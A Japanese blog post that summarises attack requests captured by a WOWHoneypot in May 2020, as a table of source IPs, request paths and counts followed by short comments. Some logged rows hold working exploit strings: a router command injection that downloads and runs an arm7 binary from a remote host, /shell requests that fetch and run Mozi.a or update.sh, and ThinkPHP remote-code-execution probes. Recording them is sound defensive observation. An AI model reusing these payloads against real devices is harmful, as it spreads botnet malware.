概要
以前の記事で構築したWowhoneypotのログを集計した結果です。
対象期間
2020/05/01-2020/05/11
※一部ログが取得できていない期間がありました。
ログの集計
| 送信元 | 内容 | 検知数 |
| 0 | ||
| 1.179.199.114 | \"POST /cgi-bin/mainfunction.cgi | 2 |
| 101.200.122.148 | \"GET /cgi-bin/test-cgi | 1 |
| \"GET /console | 1 | |
| \"GET /horde/imp/test.php | 1 | |
| \"GET /login?from=0.000000 | 1 | |
| \"GET /login.action | 1 | |
| \"GET /login/do_login | 1 | |
| \"GET /phpMyAdmin/scripts/setup.php | 2 | |
| 103.55.91.146 | \"POST /cgi-bin/mainfunction.cgi | 1 |
| 104.201.100.94 | \"POST /cgi-bin/mainfunction.cgi | 1 |
| 104.225.218.14 | \"GET /cgi-bin/luci | 1 |
| \"GET /dana-na/auth/url_default/welcome.cgi | 1 | |
| \"GET /home.asp | 1 | |
| \"GET /htmlV/welcomeMain.htm | 1 | |
| \"GET /index.asp | 1 | |
| \"GET /login.cgi?uri= | 1 | |
| \"GET /remote/login?lang=en | 1 | |
| \"GET /vpn/index.html | 1 | |
| 108.68.60.225 | \"POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://19ce033f.ngrok.io/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a | 1 |
| 111.42.66.4 | \"GET /shell?cd+/tmp;rm+-rf+*;wget+http://111.42.66.4:51051/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws | 1 |
| 113.125.117.57 | \"GET /cgi-bin/test-cgi | 1 |
| \"GET /console | 1 | |
| \"GET /horde/imp/test.php | 1 | |
| \"GET /login?from=0.000000 | 1 | |
| \"GET /login.action | 1 | |
| \"GET /login/do_login | 1 | |
| \"GET /phpMyAdmin/scripts/setup.php | 2 | |
| 113.22.217.143 | \"GET /shell?cd+/tmp;rm+-rf+*;wget+185.172.110.234/update.sh;chmod+777+/tmp/update.sh;sh+/tmp/update.sh+JAWS.REP | 1 |
| 113.220.112.59 | \"POST /GponForm/diag_Form?images/ | 1 |
| 114.113.112.92 | \"GET /manager/html | 1 |
| 115.165.205.125 | \"GET /operator/basic.shtml?id=1337 | 1 |
| \"GET /sess-bin/login_session.cgi | 1 | |
| \"GET /setup.cgi | 2 | |
| \"GET /shell?/bin/busybox+ABCD | 1 | |
| \"POST /doLogin | 1 | |
| 117.50.44.123 | \"GET /TP/public/index.php | 1 |
| \"GET /TP/public/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | 1 | |
| \"POST /TP/public/index.php?s=captcha | 1 | |
| 118.70.190.137 | \"POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://19ce033f.ngrok.io/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a | 1 |
| 121.32.151.178 | \"POST /cgi-bin/mainfunction.cgi | 2 |
| 122.51.241.15 | \"GET /TP/public/index.php | 1 |
| \"GET /TP/public/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | 1 | |
| \"POST /TP/public/index.php?s=captcha | 1 | |
| 124.186.185.157 | \"POST /cgi-bin/mainfunction.cgi | 1 |
| 125.14.48.207 | \"GET /favicon.ico | 2 |
| 128.14.133.58 | \"GET /solr/ | 1 |
| 128.14.134.170 | \"GET /Telerik.Web.UI.WebResource.axd?type=rau | 1 |
| 134.175.245.162 | \"GET /TP/public/index.php | 1 |
| \"GET /TP/public/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | 1 | |
| \"POST /TP/public/index.php?s=captcha | 1 | |
| 134.255.234.161 | \"GET /myadmin/scripts/setup.php | 2 |
| \"GET /mysql/scripts/setup.php | 1 | |
| \"GET /phpMyAdmin/scripts/setup.php | 9 | |
| \"GET /phpmyadmin2/scripts/setup.php | 1 | |
| \"GET /pma/scripts/setup.php | 1 | |
| \"POST /phpMyAdmin/scripts/setup.php | 8 | |
| 138.197.202.197 | \"GET /boaform/admin/formPing | 1 |
| 138.99.216.171 | \"GET /favicon.ico | 1 |
| \"GET /robots.txt | 1 | |
| 14.173.100.186 | \"GET /operator/basic.shtml?id=1337 | 2 |
| \"GET /sess-bin/login_session.cgi | 2 | |
| \"GET /setup.cgi | 1 | |
| \"GET /shell?/bin/busybox+ABCD | 5 | |
| \"POST /doLogin | 2 | |
| 14.230.212.73 | \"GET /operator/basic.shtml?id=1337 | 1 |
| \"GET /sess-bin/login_session.cgi | 1 | |
| \"GET /setup.cgi | 2 | |
| \"GET /shell?/bin/busybox+ABCD | 3 | |
| 144.217.207.17 | \"GET /Temporary_Listen_Addresses/SMSSERVICE | 1 |
| 147.135.209.15 | \"GET /cgi-bin/test-cgi | 1 |
| \"GET /console | 1 | |
| \"GET /horde/imp/test.php | 1 | |
| \"GET /login?from=0.000000 | 1 | |
| \"GET /login.action | 1 | |
| \"GET /login/do_login | 1 | |
| \"GET /phpMyAdmin/scripts/setup.php | 2 | |
| 147.30.47.73 | \"GET /phpmyadmin/ | 1 |
| 150.136.214.147 | \"GET /console | 1 |
| 150.136.244.194 | \"GET /cgi-bin/test-cgi | 1 |
| \"GET /console | 1 | |
| \"GET /horde/imp/test.php | 1 | |
| \"GET /login?from=0.000000 | 1 | |
| \"GET /login.action | 1 | |
| \"GET /login/do_login | 1 | |
| \"GET /phpMyAdmin/scripts/setup.php | 2 | |
| 156.96.155.242 | \"GET /admin/ | 2 |
| \"GET /agSearch/SQlite/main.php | 2 | |
| \"GET /dbadmin/ | 2 | |
| \"GET /HNAP1/ | 2 | |
| \"GET /hudson/script | 2 | |
| \"GET /main.php | 2 | |
| \"GET /myadmin/ | 2 | |
| \"GET /mysql-admin/ | 2 | |
| \"GET /mysql/ | 2 | |
| \"GET /mysqladmin/ | 2 | |
| \"GET /mysqlmanager/ | 2 | |
| \"GET /openserver/phpmyadmin/ | 2 | |
| \"GET /p/m/a/ | 2 | |
| \"GET /php-my-admin/ | 2 | |
| \"GET /php-myadmin/ | 2 | |
| \"GET /phpmanager/ | 2 | |
| \"GET /phpmy-admin/ | 2 | |
| \"GET /phpMyAdmin-2.2.3/ | 2 | |
| \"GET /phpMyAdmin-2.2.6/ | 2 | |
| \"GET /phpMyAdmin-2.5.1/ | 2 | |
| \"GET /phpMyAdmin-2.5.4/ | 2 | |
| \"GET /phpMyAdmin-2.5.5-pl1/ | 2 | |
| \"GET /phpMyAdmin-2.5.5-rc1/ | 2 | |
| \"GET /phpMyAdmin-2.5.5-rc2/ | 2 | |
| \"GET /phpMyAdmin-2.5.5/ | 2 | |
| \"GET /phpMyAdmin-2.5.6-rc1/ | 2 | |
| \"GET /phpMyAdmin-2.5.6-rc2/ | 2 | |
| \"GET /phpMyAdmin-2.5.6/ | 2 | |
| \"GET /phpMyAdmin-2.5.7-pl1/ | 2 | |
| \"GET /phpMyAdmin-2.5.7/ | 2 | |
| \"GET /phpMyAdmin-2.6.0-alpha/ | 2 | |
| \"GET /phpMyAdmin-2.6.0-alpha2/ | 2 | |
| \"GET /phpMyAdmin-2.6.0-beta1/ | 2 | |
| \"GET /phpMyAdmin-2.6.0-beta2/ | 2 | |
| \"GET /phpMyAdmin-2.6.0-pl1/ | 2 | |
| \"GET /phpMyAdmin-2.6.0-pl2/ | 2 | |
| \"GET /phpMyAdmin-2.6.0-pl3/ | 2 | |
| \"GET /phpMyAdmin-2.6.0-rc1/ | 2 | |
| \"GET /phpMyAdmin-2.6.0-rc2/ | 2 | |
| \"GET /phpMyAdmin-2.6.0-rc3/ | 2 | |
| \"GET /phpMyAdmin-2.6.0/ | 2 | |
| \"GET /phpMyAdmin-2.6.1-pl1/ | 2 | |
| \"GET /phpMyAdmin-2.6.1-pl2/ | 2 | |
| \"GET /phpMyAdmin-2.6.1-pl3/ | 2 | |
| \"GET /phpMyAdmin-2.6.1-rc1/ | 2 | |
| \"GET /phpMyAdmin-2.6.1-rc2/ | 2 | |
| \"GET /phpMyAdmin-2.6.1/ | 2 | |
| \"GET /phpMyAdmin-2.6.2-beta1/ | 2 | |
| \"GET /phpMyAdmin-2.6.2-pl1/ | 2 | |
| \"GET /phpMyAdmin-2.6.2-rc1/ | 4 | |
| \"GET /phpMyAdmin-2.6.2/ | 2 | |
| \"GET /phpMyAdmin-2.6.3-pl1/ | 2 | |
| \"GET /phpMyAdmin-2.6.3-rc1/ | 2 | |
| \"GET /phpMyAdmin-2.6.3/ | 4 | |
| \"GET /phpMyAdmin-2.6.4-pl1/ | 2 | |
| \"GET /phpMyAdmin-2.6.4-pl2/ | 2 | |
| \"GET /phpMyAdmin-2.6.4-pl3/ | 2 | |
| \"GET /phpMyAdmin-2.6.4-pl4/ | 2 | |
| \"GET /phpMyAdmin-2.6.4-rc1/ | 2 | |
| \"GET /phpMyAdmin-2.6.4/ | 2 | |
| \"GET /phpMyAdmin-2.7.0-beta1/ | 2 | |
| \"GET /phpMyAdmin-2.7.0-pl1/ | 2 | |
| \"GET /phpMyAdmin-2.7.0-pl2/ | 2 | |
| \"GET /phpMyAdmin-2.7.0-rc1/ | 2 | |
| \"GET /phpMyAdmin-2.7.0/ | 2 | |
| \"GET /phpMyAdmin-2.8.0-beta1/ | 2 | |
| \"GET /phpMyAdmin-2.8.0-rc1/ | 2 | |
| \"GET /phpMyAdmin-2.8.0-rc2/ | 2 | |
| \"GET /phpMyAdmin-2.8.0.1/ | 2 | |
| \"GET /phpMyAdmin-2.8.0.2/ | 2 | |
| \"GET /phpMyAdmin-2.8.0.3/ | 2 | |
| \"GET /phpMyAdmin-2.8.0.4/ | 2 | |
| \"GET /phpMyAdmin-2.8.0/ | 2 | |
| \"GET /phpMyAdmin-2.8.1-rc1/ | 2 | |
| \"GET /phpMyAdmin-2.8.1/ | 2 | |
| \"GET /phpMyAdmin-2.8.2/ | 2 | |
| \"GET /phpMyAdmin-2/ | 2 | |
| \"GET /phpmyadmin/ | 4 | |
| \"GET /phpmyadmin2/ | 4 | |
| \"GET /PMA/ | 4 | |
| \"GET /PMA2005/ | 4 | |
| \"GET /script | 2 | |
| \"GET /sqlite/main.php | 6 | |
| \"GET /SQLiteManager-1.2.4/main.php | 2 | |
| \"GET /sqlitemanager/main.php | 4 | |
| \"GET /sqlmanager/ | 2 | |
| \"GET /sqlweb/ | 2 | |
| \"GET /test/sqlite/SQLiteManager-1.2.0/SQLiteManager-1.2.0/main.php | 2 | |
| \"GET /webadmin/ | 2 | |
| \"GET /webdb/ | 2 | |
| \"GET /websql/ | 2 | |
| \"GET http://www.msftncsi.com/ncsi.txt | 2 | |
| 159.203.2.207 | \"GET /index.php | 1 |
| 161.35.65.8 | \"GET /news.php?type=0&time=03:32:40 | 1 |
| 162.243.135.180 | \"GET /hudson | 1 |
| 162.243.136.115 | \"GET /hudson | 1 |
| 162.243.136.136 | \"GET /hudson | 1 |
| 162.243.137.152 | \"GET /portal/redlion | 1 |
| 162.243.137.186 | \"GET /portal/redlion | 1 |
| 162.243.138.212 | \"GET /hudson | 1 |
| 162.243.138.52 | \"GET /portal/redlion | 1 |
| 162.243.138.64 | \"GET /portal/redlion | 1 |
| 162.243.139.127 | \"GET /portal/redlion | 1 |
| 162.243.139.196 | \"GET /portal/redlion | 1 |
| 162.243.141.12 | \"GET /hudson | 1 |
| 162.243.141.36 | \"GET /portal/redlion | 1 |
| 162.243.142.154 | \"GET /hudson | 1 |
| 162.243.143.114 | \"GET /portal/redlion | 1 |
| 162.243.144.101 | \"GET /manager/text/list | 1 |
| 162.243.144.139 | \"GET /manager/html | 1 |
| 162.243.144.220 | \"GET /hudson | 1 |
| 162.243.144.56 | \"GET /hudson | 1 |
| 167.172.158.192 | \"GET /phpMyAdmin/scripts/setup.php | 4 |
| \"POST /phpMyAdmin/scripts/setup.php | 4 | |
| 173.68.147.70 | \"POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://19ce033f.ngrok.io/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a | 1 |
| 178.129.218.230 | \"POST /goform/webLogin | 1 |
| 180.97.215.22 | \"GET /console/login/LoginForm.jsp | 1 |
| 181.117.123.34 | \"POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://19ce033f.ngrok.io/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a | 1 |
| 181.44.216.49 | \"POST /cgi-bin/mainfunction.cgi | 1 |
| 185.128.41.50 | \"GET /manager/html | 514 |
| 186.101.230.155 | \"POST /cgi-bin/mainfunction.cgi | 1 |
| 186.216.133.187 | \"GET /phpmyadmin/ | 1 |
| 186.4.212.142 | \"POST /cgi-bin/mainfunction.cgi | 1 |
| 187.206.10.237 | \"POST /cgi-bin/mainfunction.cgi | 1 |
| 190.162.150.62 | \"POST /cgi-bin/mainfunction.cgi | 1 |
| 190.166.176.99 | \"POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://19ce033f.ngrok.io/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a | 1 |
| 190.85.145.162 | \"POST /cgi-bin/mainfunction.cgi | 1 |
| 191.162.75.194 | \"GET /adv | 1 |
| 192.241.234.95 | \"GET /portal/redlion | 1 |
| 193.239.212.80 | \"GET /cgi-bin/test-cgi | 1 |
| \"GET /console | 1 | |
| \"GET /horde/imp/test.php | 1 | |
| \"GET /login?from=0.000000 | 1 | |
| \"GET /login.action | 1 | |
| \"GET /login/do_login | 1 | |
| \"GET /phpMyAdmin/scripts/setup.php | 2 | |
| 194.190.49.175 | \"POST /cgi-bin/mainfunction.cgi | 1 |
| 195.54.160.121 | \"GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> | 5 |
| \"GET /?XDEBUG_SESSION_START=phpstorm | 5 | |
| \"GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP | 5 | |
| \"GET /solr/admin/info/system?wt=json | 5 | |
| \"GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | 3 | |
| \"POST /api/jsonws/invoke | 5 | |
| \"POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | 3 | |
| 197.232.1.182 | \"GET /manager/html | 2 |
| 198.23.137.161 | \"GET /webdav/ | 1 |
| 200.46.45.114 | \"POST /cgi-bin/mainfunction.cgi | 1 |
| 201.202.31.170 | \"POST /cgi-bin/mainfunction.cgi | 2 |
| 202.40.191.115 | \"GET /TP/public/index.php | 1 |
| \"GET /TP/public/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | 1 | |
| \"POST /TP/public/index.php?s=captcha | 1 | |
| 202.43.114.124 | \"GET /cgi-bin/luci | 1 |
| \"GET /dana-na/auth/url_default/welcome.cgi | 1 | |
| \"GET /home.asp | 1 | |
| \"GET /htmlV/welcomeMain.htm | 1 | |
| \"GET /index.asp | 1 | |
| \"GET /login.cgi?uri= | 1 | |
| \"GET /remote/login?lang=en | 1 | |
| \"GET /vpn/index.html | 1 | |
| 203.195.250.141 | \"GET /TP/public/index.php | 1 |
| \"GET /TP/public/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | 1 | |
| \"POST /TP/public/index.php?s=captcha | 1 | |
| 208.111.86.112 | \"POST /cgi-bin/mainfunction.cgi | 1 |
| 209.97.171.62 | \"GET /news.php?type=0&time=20:16:39 | 1 |
| 210.186.154.100 | \"POST /cgi-bin/mainfunction.cgi | 1 |
| 210.200.164.170 | \"GET /operator/basic.shtml?id=1337 | 2 |
| \"GET /sess-bin/login_session.cgi | 1 | |
| \"GET /setup.cgi | 2 | |
| \"GET /shell?/bin/busybox+ABCD | 1 | |
| \"POST /doLogin | 1 | |
| 213.14.32.42 | \"POST /boaform/admin/formPing | 1 |
| 220.189.199.83 | \"POST /boaform/admin/formPing | 1 |
| 223.149.50.181 | \"POST /GponForm/diag_Form?images/ | 1 |
| 24.103.99.74 | \"POST /boaform/admin/formPing | 1 |
| 35.165.171.226 | \"OPTIONS / | 1 |
| 35.242.190.47 | \"OPTIONS / | 1 |
| 35.243.249.104 | \"OPTIONS / | 1 |
| 36.66.4.62 | \"GET /user/soapCaller.bs | 1 |
| 36.72.114.177 | \"POST /cgi-bin/mainfunction.cgi | 1 |
| 39.96.14.213 | \"GET /cgi-bin/test-cgi | 1 |
| \"GET /console | 1 | |
| \"GET /horde/imp/test.php | 1 | |
| \"GET /login?from=0.000000 | 1 | |
| \"GET /login.action | 1 | |
| \"GET /login/do_login | 1 | |
| \"GET /phpMyAdmin/scripts/setup.php | 2 | |
| 45.13.93.82 | \"CONNECT ip.ws.126.net:443 | 4 |
| 45.13.93.90 | \"CONNECT ip.ws.126.net:443 | 1 |
| 45.14.151.246 | \"GET http://163.172.88.110:41298/pass | 2 |
| 45.148.10.182 | \"GET /shell?cd+/tmp;rm+-rf+*;wget+185.172.110.234/update.sh;chmod+777+/tmp/update.sh;sh+/tmp/update.sh | 1 |
| 45.46.222.55 | \"POST /boaform/admin/formPing | 1 |
| 45.65.222.136 | \"POST /cgi-bin/mainfunction.cgi | 1 |
| 45.9.148.220 | \"HEAD /lPn3 | 1 |
| 49.143.32.6 | \"GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws | 1 |
| 49.81.199.54 | \"GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws | 1 |
| 5.101.0.209 | \"GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> | 5 |
| \"GET /?XDEBUG_SESSION_START=phpstorm | 5 | |
| \"GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP | 5 | |
| \"GET /solr/admin/info/system?wt=json | 5 | |
| \"GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | 5 | |
| \"GET /webadmin | 1 | |
| \"POST /api/jsonws/invoke | 5 | |
| \"POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | 5 | |
| 5.188.210.101 | \"GET http://5.188.210.101/echo.php | 1 |
| 50.195.159.9 | \"GET /operator/basic.shtml?id=1337 | 1 |
| \"GET /sess-bin/login_session.cgi | 2 | |
| \"GET /setup.cgi | 2 | |
| \"GET /shell?/bin/busybox+ABCD | 1 | |
| 50.246.41.126 | \"POST /boaform/admin/formPing | 1 |
| 51.158.168.21 | \"GET /* | 1 |
| \"GET /form | 1 | |
| \"GET /helpz | 1 | |
| \"GET /httpz | 1 | |
| \"GET /loginz | 1 | |
| \"GET /statusz | 1 | |
| 58.165.226.75 | \"POST /cgi-bin/mainfunction.cgi | 1 |
| 60.188.118.162 | \"GET /shell?cd+/tmp;rm+-rf+*;wget+http://60.188.118.162:50342/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws | 1 |
| 60.191.52.254 | \"HEAD http://112.124.42.80:63435/ | 1 |
| 64.227.113.74 | \"GET /news.php?type=1&hash=01555aeeb45cfd2a8d44cad1b159b9c3&time=15:55:44 | 1 |
| 64.227.126.167 | \"POST /file_handler/file.php | 1 |
| 64.227.34.58 | \"GET /api.php | 1 |
| \"GET /client_area/ | 1 | |
| \"GET /login.php | 1 | |
| \"GET /stalker_portal/c/ | 1 | |
| \"GET /stalker_portal/c/version.js | 1 | |
| \"GET /streaming | 1 | |
| \"GET /streaming/clients_live.php | 2 | |
| \"GET /streaming/RkKslIXGiO.php | 1 | |
| \"GET /system_api.php | 1 | |
| 71.78.133.84 | \"POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://19ce033f.ngrok.io/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a | 1 |
| 76.190.126.50 | \"POST /cgi-bin/mainfunction.cgi | 1 |
| 78.47.53.34 | \"GET http://www.example.com/ | 1 |
| 80.82.68.16 | \"GET /favicon.ico | 1 |
| \"GET /robots.txt | 1 | |
| 80.82.78.104 | \"POST /dvr/cmd | 2 |
| \"POST /editBlackAndWhiteList | 2 | |
| \"POST /goform/webLogin | 1 | |
| 81.170.214.154 | \"GET /cgi-bin/test-cgi | 1 |
| \"GET /console | 1 | |
| \"GET /horde/imp/test.php | 1 | |
| \"GET /login?from=0.000000 | 1 | |
| \"GET /login.action | 1 | |
| \"GET /login/do_login | 1 | |
| \"GET /phpMyAdmin/scripts/setup.php | 2 | |
| 81.183.155.83 | \"GET / | 1 |
| 85.89.174.32 | \"GET /adv | 1 |
| 89.130.115.165 | \"POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://19ce033f.ngrok.io/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a | 1 |
| 89.169.0.185 | \"GET /adv | 1 |
| 91.194.84.46 | \"CONNECT checkip.amazonaws.com:443 | 3 |
| \"GET http://checkip.amazonaws.com/ | 3 | |
| 94.200.76.222 | \"POST /boaform/admin/formPing | 1 |
| 95.217.15.1 | \"GET http://steamcommunity.com/ | 1 |
| 96.56.160.50 | \"POST /boaform/admin/formPing | 1 |
| 96.65.72.247 | \"POST /cgi-bin/mainfunction.cgi | 1 |
| 96.80.89.253 | \"POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://192.3.45.185/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a | 1 |
| 99.230.166.85 | \"POST /cgi-bin/mainfunction.cgi | 1 |
| 99.242.65.18 | \"POST /cgi-bin/mainfunction.cgi | 2 |
コメント
- 「GET /manager/html」を514回検知している。
上記はApache Tomcatに対する攻撃と推測。増えた理由は不明。 - どういった内容かまでは調べられていないですが、「GET /shell?/bin/busybox+ABCD」を検知
- 「operator/basic.shtml」はネットワークカメラに対する攻撃と推察
- 「GET /hudson」の関連情報
